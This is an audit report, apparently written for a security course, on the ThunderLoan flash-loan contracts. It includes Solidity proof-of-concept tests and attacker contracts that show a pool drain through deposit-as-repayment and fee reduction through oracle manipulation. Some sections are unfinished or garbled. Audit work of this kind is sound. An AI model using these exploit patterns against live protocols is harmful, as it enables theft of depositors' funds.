



# Protocol Audit Report

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## Protocol Summary

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Protocol does X, Y, Z

## Disclaimer

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Rong Wei Zhang makes all effort to find as many vulnerabilities in the code in the given time period, but holds no responsibilities for the findings provided in this document. A security audit by the team is not an endorsement of the underlying business or product. The audit was time-boxed and the review of the code was solely on the security aspects of the Solidity implementation of the contracts.

## Risk Classification

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		Impact		
		High	Medium	Low
Likelihood	High	H	H/M	M
	Medium	H/M	M	M/L
	Low	M	M/L	L

We use the [CodeHawks](#) severity matrix to determine severity. See the documentation for more details.

## Audit Details

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Commit Hash: 8803f851f6b37e99eab2e94b4690c8b70e26b3f6

- Solc Version: 0.8.20
- Chain(s) to deploy contract to: Ethereum
- ERC20s:
  - USDC
  - DAI
  - LINK
  - WETH

## Scope

```
#-- interfaces
|  #-- IFlashLoanReceiver.sol
|  #-- IPoolFactory.sol
|  #-- ITSwapPool.sol
|  #-- IThunderLoan.sol
#-- protocol
|  #-- AssetToken.sol
|  #-- OracleUpgradeable.sol
|  #-- ThunderLoan.sol
#-- upgradedProtocol
|  #-- ThunderLoanUpgraded.sol
```

## Roles

- Owner: The owner of the protocol who has the power to upgrade the implementation.
- Liquidity Provider: A user who deposits assets into the protocol to earn interest.
- User: A user who takes out flash loans from the protocol.

## Executive Summary

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Followed Cyfrin Updraft's smart contract security course to identify vulnerabilities and possible improvement.

## Issues found

Severity	Number of issues found
High	2
Medium	4
Low	1
Info	2
Gas	1

Severity	Number of issues found
Total	10

## Findings

### High

[H-1] The user can flashloan and deposit in the liquidity pool. Which allow them to withdraw the flashloan amount after repaying it.

IMPACT: HIGH

LIKELIHOOD: HIGH

**Description:** Since the `ThunderLoan::flashloan` only checks if the balance of `AssetToken` to see if the loan has been repayed, the user could simply deposit the loan and fee into the liquidity pool and the loan will be seen as paid.

**Impact:** The user could steal all the money from the pool.

**Proof of Concept:**

1. The attacker calls flash loan to loan some amount of money.
2. The attacker contract repay the loan and fees by depositing in the `AssetToken` pool as a liquidity provider.
3. The transaction succeed since the contract see the wished balance.
4. The attacker can withdraw the amount that he repaid by redeeming from the pool.

► Code

```
function testLoanAndRepayByDeposit() public {
    // 1. Set up the oracle
    thunderLoan = new ThunderLoan();
    tokenA = new ERC20Mock();
    proxy = new ERC1967Proxy(address(thunderLoan), "");
    thunderLoan = ThunderLoan(address(proxy));
    BuffMockPoolFactory poolFactory = new BuffMockPoolFactory(
        address(weth)
    );
    address tswapPool = poolFactory.createPool(address(tokenA));
    thunderLoan.initialize(address(poolFactory));

    // 2. fund TSwap 1:1 ratio
    vm.startPrank(liquidityProvider);
    weth.mint(address(liquidityProvider), 100e18);
    weth.approve(address(tswapPool), 100e18);
    tokenA.mint(address(liquidityProvider), 100e18);
    tokenA.approve(address(tswapPool), 100e18);
```

```

        BuffMockTSwap(tswapPool).deposit(
            100e18,
            BuffMockTSwap(tswapPool).getMinimumWethDepositAmount(),
            100e18,
            block.timestamp
        );
        vm.stopPrank();

        // 3. Deposit to ThunderLoan
        vm.prank(thunderLoan.owner());
        thunderLoan.setAllowedToken(tokenA, true);

        vm.startPrank(liquidityProvider);
        tokenA.mint(address(liquidityProvider), 1000e18);
        tokenA.approve(address(thunderLoan), 1000e18);
        thunderLoan.deposit(tokenA, 1000e18);
        vm.stopPrank();
        // 5. Flashloan to the user
        uint256 initialBalance = tokenA.balanceOf(
            address(thunderLoan.getAssetFromToken(tokenA))
        );
        LoanAndDeposit loanAndDeposit = new LoanAndDeposit(
            address(thunderLoan),
            address(thunderLoan.getAssetFromToken(tokenA))
        );
        vm.startPrank(user);
        tokenA.mint(address(loanAndDeposit), 150e18);
        thunderLoan.flashloan(address(loanAndDeposit), tokenA, 100e18,
    """);
        loanAndDeposit.withdraw(
            tokenA,
            IERC20(address(thunderLoan.getAssetFromToken(tokenA)))
        );
        uint256 finalBalance = tokenA.balanceOf(
            address(thunderLoan.getAssetFromToken(tokenA))
        );
        console.log("initialBalance", initialBalance);
        console.log("finalBalance", finalBalance);
        console.log("difference", initialBalance - finalBalance);
        vm.stopPrank();
    }

    contract LoanAndDeposit is IFlashLoanReceiver {
        ThunderLoan s_thunderLoan;
        uint256 initialExchangeRate;

        constructor(address thunderLoan, address repayAddress) {
            s_thunderLoan = ThunderLoan(thunderLoan);
        }

        function executeOperation(
            address token,
            uint256 amount,

```

```

        uint256 fee,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        IERC20(token).approve(address(s_thunderLoan), amount + fee);
        s_thunderLoan.deposit(IERC20(token), amount + fee);
        return true;
    }

    function withdraw(IERC20 token, IERC20 assetToken) external {
        s_thunderLoan.redeem(token, type(uint256).max);
    }
}

```

**Recommended Mitigation:** Use another to check if the user has repayed and track the balance using a storage variable and update that balance when user deposits or redeem.

[H-2] **ThunderLoanUpgraded**'s storage layout is different of **ThunderLoanUpgraded** storage layout, creating storage collision.

IMPACT: HIGH

LIKELIHOOD: HIGH

**Description:** The function in the proxy will call to the wrong storage spot since

**Impact:** The fee after will be incorrect and the contract will work weirdly or just simply won't work.

**\*\*Proof of Concept:\*\***Upgrading the contract changes the fee.

► Code

```

function testUpgradeBreaks() public {
    uint256 feeBefore = thunderLoan.getFee();
    vm.startPrank(thunderLoan.owner());
    ThunderLoanUpgraded thunderLoanUpgraded = new ThunderLoanUpgraded();
    thunderLoan.upgradeToAndCall(address(thunderLoanUpgraded), "");
    vm.stopPrank();
    uint256 feeAfter = thunderLoan.getFee();
    console.log("feeBefore", feeBefore);
    console.log("feeAfter", feeAfter);
}

```

**Recommended Mitigation:** Leave the storage slot blank if you dont need it to not create conflict.

## Medium

[M-1] Updating fees during deposit increases the fees for nothing and make withdrawal hard

IMPACT: MEDIUM

LIKELIHOOD: HIGH

**Description:** A fee calculation `ThunderLoan::getCalculatedFee` and exchange rate `AssetToken::updateExchangeRate` update was done during the deposit, which shouldnt happen and thus increases the exchange rate `AssetToken::s_exchangeRate`.

```
function deposit(
    IERC20 token,
    uint256 amount
) external revertIfZero(amount) revertIfNotAllowedToken(token) {
    AssetToken assetToken = s_tokenToAssetToken[token];
    uint256 exchangeRate = assetToken.getExchangeRate();
    uint256 mintAmount = (amount *
assetToken.EXCHANGE_RATE_PRECISION()) /
        exchangeRate;
    emit Deposit(msg.sender, token, amount);
    assetToken.mint(msg.sender, mintAmount);
@>    uint256 calculatedFee = getCalculatedFee(token, amount);
@>    assetToken.updateExchangeRate(calculatedFee);
    token.safeTransferFrom(msg.sender, address(assetToken), amount);
}
```

**Impact:** An increase in exchange rate `AssetToken::s_exchangeRate` makes the user receive more pool token for one asset token than what he should receive which can lead to insufficient balance of the `AssetToken` contract.

**Proof of Concept:** During the following test, the liquidityProvider is not able to withdraw funds after depositing and lending a flashLoan to a user.

► Code

```
function testRedeemAfterFlashLoan() public setAllowedToken hasDeposits
{
    uint256 amountToBorrow = AMOUNT * 10;
    uint256 calculatedFee = thunderLoan.getCalculatedFee(
        tokenA,
        amountToBorrow
    );
    vm.startPrank(user);
    uint256 fee = thunderLoan.getCalculatedFee(tokenA,
amountToBorrow);
    tokenA.mint(address(mockFlashLoanReceiver), fee);
    uint256 balanceBefore = tokenA.balanceOf(
        address(mockFlashLoanReceiver)
    );
}
```

```

        console.log(balanceBefore);
        thunderLoan.flashloan(
            address(mockFlashLoanReceiver),
            tokenA,
            amountToBorrow,
            ""
        );
        vm.stopPrank();
        vm.startPrank(liquidityProvider);
        thunderLoan.redeem(tokenA, DEPOSIT_AMOUNT);
        vm.stopPrank();
        assert(tokenA.balanceOf(liquidityProvider) > AMOUNT);
    }

```

**Recommended Mitigation:** Don't calculate the fees and update exchange rates in `ThunderLoan::deposit`.

[M-2] User can get cheaper fees by manipulating oracles with the loan.

IMPACT: MEDIUM

LIKELIHOOD: MEDIUM

**Description:** Using TSwap as price oracle for fee calculations leads to oracle manipulation attacks.

**Impact:** User may pay less fees which may impact the revenue of liquidity providers.

**Proof of Concept:**

► Code

```

function testOracles() public {
    // 1. Set up the oracle
    thunderLoan = new ThunderLoan();
    tokenA = new ERC20Mock();
    proxy = new ERC1967Proxy(address(thunderLoan), "");
    thunderLoan = ThunderLoan(address(proxy));
    BuffMockPoolFactory poolFactory = new BuffMockPoolFactory(
        address(weth)
    );
    address tswapPool = poolFactory.createPool(address(tokenA));
    thunderLoan.initialize(address(poolFactory));

    // 2. fund TSwap 1:1 ratio
    vm.startPrank(liquidityProvider);
    weth.mint(address(liquidityProvider), 100e18);
    weth.approve(address(tswapPool), 100e18);
    tokenA.mint(address(liquidityProvider), 100e18);
    tokenA.approve(address(tswapPool), 100e18);
    BuffMockTSwap(tswapPool).deposit(
        100e18,
        BuffMockTSwap(tswapPool).getMinimumWethDepositAmount(),
    );
}

```



```

        100e18,
        block.timestamp
    );
    vm.stopPrank();

    // 3. Deposit to ThunderLoan
    vm.prank(thunderLoan.owner());
    thunderLoan.setAllowedToken(tokenA, true);

    vm.startPrank(liquidityProvider);
    tokenA.mint(address(liquidityProvider), 1000e18);
    tokenA.approve(address(thunderLoan), 1000e18);
    thunderLoan.deposit(tokenA, 1000e18);
    vm.stopPrank();
    // 4. show that fee can be largely reduced by exploiting the
oracle
    uint256 normalFee = thunderLoan.getCalculatedFee(tokenA, 100e18);
    console.log("normalFee", normalFee);
    // 5. Flashloan to the user
    BadFlashLoanReceiver badFlashLoanReceiver = new
BadFlashLoanReceiver(
        address(thunderLoan),
        tswapPool,
        address(thunderLoan.getAssetFromToken(tokenA))
    );
    vm.startPrank(user);
    tokenA.mint(address(badFlashLoanReceiver), 150e18);
    thunderLoan.flashloan(
        address(badFlashLoanReceiver),
        tokenA,
        100e18,
        ""
    );
    vm.stopPrank();
    console.log("feeOne", badFlashLoanReceiver.feeOne());
    console.log("feeTwo", badFlashLoanReceiver.feeTwo());
    // 6. Repay the flashloan
}

contract BadFlashLoanReceiver is IFlashLoanReceiver {
    ThunderLoan s_thunderLoan;
    BuffMockTSwap s_tswapPool;
    address s_repayAddress;
    bool attacked = false;
    uint256 public feeOne;
    uint256 public feeTwo;

    constructor(address thunderLoan, address tswapPool, address
repayAddress) {
        s_thunderLoan = ThunderLoan(thunderLoan);
        s_tswapPool = BuffMockTSwap(tswapPool);
        s_repayAddress = repayAddress;
    }
}

```

```

function executeOperation(
    address token,
    uint256 amount,
    uint256 fee,
    address initiator,
    bytes calldata params
) external returns (bool) {
    if (!attacked) {
        feeOne = fee;
        //do the swap
        IERC20(token).approve(address(s_tswapPool), amount);
        s_tswapPool.swapPoolTokenForWethBasedOnInputPoolToken(
            amount,
            s_tswapPool.getMinimumWethDepositAmount(),
            block.timestamp
        );
        attacked = true;
        s_thunderLoan.flashloan(address(this), IERC20(token), amount,
    """);
        IERC20(token).transfer(address(s_repayAddress), amount + fee);
    } else {
        //repay the flashloan and calculate fee
        feeTwo = fee;
        IERC20(token).transfer(address(s_repayAddress), amount + fee);
    }
    return true;
}
}

```

**Recommended Mitigation:** Consider using a different price oracle mechanism, like a Chainlink price feed with a Uniswap fallback oracle.

[M-3] Nsted `ThunderLoan::flashloan` calls cannot use `ThunderLoan::repay` function.

IMPACT: MEDIUM

LIKELIHOOD: HIGH/MEDIUM

**Description:** `ThudnerLoan::s_currentlyFlashLoaning` is set to false before the first flashloan returns and prevents subsequent repay to execute.

1. `ThudnerLoan::s_currentlyFlashLoaning` set to false before returning.

```

receiverAddress.functionCall(
    abi.encodeCall(
        IFlashLoanReceiver.executeOperation,
        (
            address(token),
            amount,
            fee,

```

```

        msg.sender, // initiator
        params
    )
    )
);

uint256 endingBalance = token.balanceOf(address(assetToken));
if (endingBalance < startingBalance + fee) {
    revert ThunderLoan__NotPaidBack(
        startingBalance + fee,
        endingBalance
    );
}
@> s_currentlyFlashLoaning[token] = false;

```

2. `ThunderLoan::repay` reverts if `ThudnerLoan::s_currentlyFlashLoaning` is false.

```

function repay(IERC20 token, uint256 amount) public {
@>     if (!s_currentlyFlashLoaning[token]) {
@>         revert ThunderLoan__NotCurrentlyFlashLoaning();
    }
    AssetToken assetToken = s_tokenToAssetToken[token];
    token.safeTransferFrom(msg.sender, address(assetToken), amount);
}

```

**Impact:** Nested flashloans cannot use repay function to repay but can still happen using transfer function.

**Recommended Mitigation:** Use a local variable to store if there was already a flashloan, if yes don't set `ThudnerLoan::s_currentlyFlashLoaning` to false.

[M-4] If redeem happens during flashloan, the protocol will see the balance decrease as `ThunderLoan__NotPaidBack`.

IMPACT: MEDIUM

LIKELIHOOD: MEDIUM/LOW

**Description:** The reduction in balance caused by the redeem make the protocol think that the user has not paid back the loan and revert the transaction.

**Impact:** This could affect the availability of the protocol.

**Proof of Concept:**

1. Deposit liquidity into the pool.
2. Call the flashloan function.
3. Repay the loan with the fees.
4. Before returning redeem the previously deposited liquidity.
5. The balance of `AssetToekn` is lower than the balance before and the flashloan function reverts.

## ► Code

```

function testDepositLoanRepayRedeem() public {
    // 1. Set up the oracle
    thunderLoan = new ThunderLoan();
    tokenA = new ERC20Mock();
    proxy = new ERC1967Proxy(address(thunderLoan), "");
    thunderLoan = ThunderLoan(address(proxy));
    BuffMockPoolFactory poolFactory = new BuffMockPoolFactory(
        address(weth)
    );
    address tswapPool = poolFactory.createPool(address(tokenA));
    thunderLoan.initialize(address(poolFactory));

    // 2. fund TSwap 1:1 ratio
    vm.startPrank(liquidityProvider);
    weth.mint(address(liquidityProvider), 100e18);
    weth.approve(address(tswapPool), 100e18);
    tokenA.mint(address(liquidityProvider), 100e18);
    tokenA.approve(address(tswapPool), 100e18);
    BuffMockTSwap(tswapPool).deposit(
        100e18,
        BuffMockTSwap(tswapPool).getMinimumWethDepositAmount(),
        100e18,
        block.timestamp
    );
    vm.stopPrank();

    // 3. Deposit to ThunderLoan
    vm.prank(thunderLoan.owner());
    thunderLoan.setAllowedToken(tokenA, true);

    vm.startPrank(liquidityProvider);
    tokenA.mint(address(liquidityProvider), 1000e18);
    tokenA.approve(address(thunderLoan), 1000e18);
    thunderLoan.deposit(tokenA, 1000e18);
    vm.stopPrank();

    // 5. Flashloan to the user
    uint256 initialBalance = tokenA.balanceOf(
        address(thunderLoan.getAssetFromToken(tokenA))
    );
    DepositLoanAndRepay depositLoanAndRepay = new DepositLoanAndRepay(
        address(thunderLoan),
        address(thunderLoan.getAssetFromToken(tokenA))
    );
    tokenA.mint(address(depositLoanAndRepay), 150e18);
    depositLoanAndRepay.deposit(tokenA, 100e18);
    vm.startPrank(user);
    vm.expectRevert();
    thunderLoan.flashloan(address(depositLoanAndRepay), tokenA,
100e18, "");
    vm.stopPrank();
}

```

```

contract DepositLoanAndRepay is IFlashLoanReceiver {
    ThunderLoan s_thunderLoan;

    constructor(address thunderLoan, address repayAddress) {
        s_thunderLoan = ThunderLoan(thunderLoan);
    }

    function deposit(IERC20 token, uint256 amount) external {
        IERC20(token).approve(address(s_thunderLoan), amount);
        s_thunderLoan.deposit(IERC20(token), amount);
    }

    function executeOperation(
        address token,
        uint256 amount,
        uint256 fee,
        address initiator,
        bytes calldata params
    ) external returns (bool) {
        IERC20(token).approve(address(s_thunderLoan), amount + fee);
        s_thunderLoan.repay(IERC20(token), amount + fee);
        withdraw(IERC20(token));
        return true;
    }

    function withdraw(IERC20 token) internal {
        s_thunderLoan.redeem(token, type(uint256).max);
    }
}

```

```
|    |      ↵ ← [Return] 1000242280717038037653 [1e21]  
|    |      ↵ ← [Revert] ThunderLoan__NotPaidBack(1100296147410319118389  
[1.1e21], 1000242280717038037653 [1e21])  
|      ↵ ← [Revert] ThunderLoan__NotPaidBack(1100296147410319118389  
[1.1e21], 1000242280717038037653 [1e21])
```

### Recommended Mitigation:

Low

[L-1] The `IThunderLoan` interface has incorrectly defined function.

IMPACT: MEDIUM/LOW

LIKELIHOOD: HIGH

**Description:** The `IThunderLoan::repay` takes `address token` while `ThunderLoan::repay` takes `IERC20 token`.

```
interface IThunderLoan {  
    function repay(address token, uint256 amount) external;  
}  
  
function repay(IERC20 token, uint256 amount) public
```

**Impact:** The function `repay` won't be able to be called from `IThunderLoan` interface.

**Recommended Mitigation:** Use the same type for the parameters.

## Informational

---

[I-1] Unused import that is only used during test imports.

**Description:**

```
import { IThunderLoan } from "../IThunderLoan.sol";
```

**Recommended Mitigation:** This should be removed and imports should be done inside test files.

[I-2] An event should be emitted on storage variable change.

**Description:** Emit an event for easier off-chain accessibility.

```
function updateFlashLoanFee(uint256 newFee) external onlyOwner {  
    if (newFee > s_feePrecision) {  
        revert ThunderLoan\_\_BadNewFee();  
    }  
    s_flashLoanFee = newFee;  
}
```

## Gas

---

[G-1] TITLE Functions not used internally should be declared external to save gas.

**Description:** This function

```
function repay(IERC20 token, uint256 amount) public {  
    if (!s_currentlyFlashLoaning[token]) {  
        revert ThunderLoan\_\_NotCurrentlyFlashLoaning();  
    }  
}
```

```
}  
AssetToken assetToken = s_tokenToAssetToken[token];  
token.safeTransferFrom(msg.sender, address(assetToken), amount);  
}
```

**Recommended Mitigation:** Change to external.